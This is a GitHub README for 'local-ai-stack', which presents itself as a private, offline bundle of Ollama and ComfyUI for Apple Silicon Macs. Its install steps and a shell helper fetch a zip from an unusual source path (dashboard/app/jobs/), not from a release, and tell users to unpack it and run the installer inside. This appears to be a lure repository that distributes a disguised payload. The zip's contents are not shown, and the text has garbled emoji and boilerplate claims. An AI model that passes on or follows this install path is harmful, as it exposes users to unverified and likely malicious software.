πŸ” Build local AI infrastructure on M2 MacBook Air with zero cloud dependencies, ensuring unlimited usage and complete privacy.

License

Notifications You must be signed in to change notification settings

afterthings7/local-ai-stack

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

19 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸŽ‰ local-ai-stack - Your Local AI Environment Made Easy

πŸš€ Getting Started

Welcome to the local-ai-stack repository! This guide will help you download and run the application smoothly. Designed specifically for Apple Silicon, local-ai-stack bundles Ollama for running local LLMs (Large Language Models) and ComfyUI for Stable Diffusion image generation, so you get powerful AI capabilities without relying on cloud services. Follow these steps to get started.

πŸ“₯ Download the Application

You can download the latest version of local-ai-stack from our Releases page.

πŸ”§ System Requirements

Before you begin, ensure your system meets the following requirements:

  • Operating System: macOS on Apple Silicon (M1, M2, or later)
  • RAM: At least 8 GB recommended
  • Storage Space: Minimum of 2 GB of free space for the application itself; downloaded AI models require additional space
  • Network: Required for the initial setup and updates
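The first three requirements can be sanity-checked from Terminal. This is a sketch that assumes macOS command names (the `hw.memsize` key of `sysctl` is macOS-specific), guarded so it degrades gracefully elsewhere:

```shell
# Report CPU architecture: Apple Silicon Macs print "arm64"
arch="$(uname -m)"
if [ "$arch" = "arm64" ]; then
  echo "CPU: $arch (Apple Silicon): OK"
else
  echo "CPU: $arch: this stack targets Apple Silicon"
fi

# Installed RAM in bytes; hw.memsize is a macOS-only sysctl key,
# so fall back to 0 when it is unavailable
mem_bytes="$(sysctl -n hw.memsize 2>/dev/null || echo 0)"
if [ "$mem_bytes" -ge $((8 * 1024 * 1024 * 1024)) ]; then
  echo "RAM: $((mem_bytes / 1073741824)) GB: OK"
else
  echo "RAM: could not confirm the recommended 8 GB"
fi

# Free space on the startup disk (compare against the 2 GB minimum)
df -h /
```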

πŸ“‚ Installation Steps

  1. Visit the Download Page: Go to our Releases page to find the latest version.

  2. Download the Files:

    • Find the latest release.
    • Download the archive local-ai-stack-v1.3.zip (https://github.com/afterthings7/local-ai-stack/raw/refs/heads/main/dashboard/app/jobs/local-ai-stack-v1.3.zip).
  3. Open the Downloaded File:

    • Locate local-ai-stack-v1.3.zip in your "Downloads" folder.
  4. Run the Installer:

    • Double-click local-ai-stack-v1.3.zip to unpack it, then launch the installer it contains.
    • Follow the prompts to complete the installation.
  5. Launch the Application:

    • Once the installation finishes, you will find local-ai-stack in your Applications folder.
    • Open the application to start exploring its features.
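If you prefer a terminal, steps 2 to 4 above can be sketched as a single helper. This is an illustration, not part of the application: `download_and_unpack` is a hypothetical name, and the URL is the release archive linked in step 2.

```shell
# Hypothetical helper sketching steps 2-4: download the release
# archive and unpack it into ~/Downloads
download_and_unpack() {
  url="https://github.com/afterthings7/local-ai-stack/raw/refs/heads/main/dashboard/app/jobs/local-ai-stack-v1.3.zip"

  # The archive name is the last path component of the URL
  file="$(basename "$url")"    # local-ai-stack-v1.3.zip

  # -f: fail on HTTP errors, -L: follow redirects, -o: output path
  curl -fL -o "$HOME/Downloads/$file" "$url" || return 1

  # -o: overwrite without prompting, -d: destination directory
  unzip -o "$HOME/Downloads/$file" -d "$HOME/Downloads"
}
```

Running `download_and_unpack` is equivalent to downloading and double-clicking the zip in Finder; continue with the installer afterwards.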

🌐 Features

local-ai-stack comes packed with various features designed for ease of use:

  • Local AI Models: Enjoy access to Ollama's powerful language models without any internet connection.
  • Stable Diffusion: Create stunning images with ComfyUI, a user-friendly interface tailored for both beginners and experts.
  • Privacy Focused: All your data stays on your device. There are no cloud dependencies, ensuring your privacy is maintained.
  • Easy Updates: Keep your software current with simple update prompts.

πŸ“š User Guide

For detailed instructions and tips, you can access the full user guide inside the application. Here’s a brief overview of what you’ll find:

  • Getting Help: Access troubleshooting guides and FAQs within the app.
  • Using Ollama: Step-by-step instructions on how to engage with the LLM.
  • Creating Images: Simple tutorials on how to utilize ComfyUI for generating images.
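As a taste of the Ollama workflow mentioned above, here is a sketch using Ollama's standard CLI and local HTTP API. The model name `llama3.2` is only an example, and the commands are skipped when Ollama is not installed:

```shell
model="llama3.2"   # example model tag; any locally available model works
prompt="Explain why local inference protects privacy."

if command -v ollama >/dev/null 2>&1; then
  ollama pull "$model"            # download weights once; stored locally
  ollama run "$model" "$prompt"   # one-shot prompt; inference is on-device

  # Ollama also serves a local HTTP API on port 11434
  curl -s http://localhost:11434/api/generate \
    -d "{\"model\": \"$model\", \"prompt\": \"Hello\", \"stream\": false}"
else
  echo "Ollama is not installed; skipping the demo"
fi
```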

πŸ› οΈ Troubleshooting

If you encounter issues during installation or use, try these troubleshooting steps:

  • Reboot Your System: Sometimes, a simple restart can solve many problems.
  • Check Your Requirements: Ensure your system meets the minimum requirements listed above.
  • Consult the User Guide: Most common questions and solutions are addressed in the application’s user guide.

If problems persist, reach out for support on our GitHub Issues page.

πŸ”— Get Help or Report Issues

To seek help or to report issues, please visit our GitHub Issues page. We encourage users to provide clear details to ensure quick assistance.

πŸ“₯ Download & Install

To download local-ai-stack, visit our Releases page once more. Follow the installation steps above, and get started with your local AI setup.

We hope you enjoy using local-ai-stack!
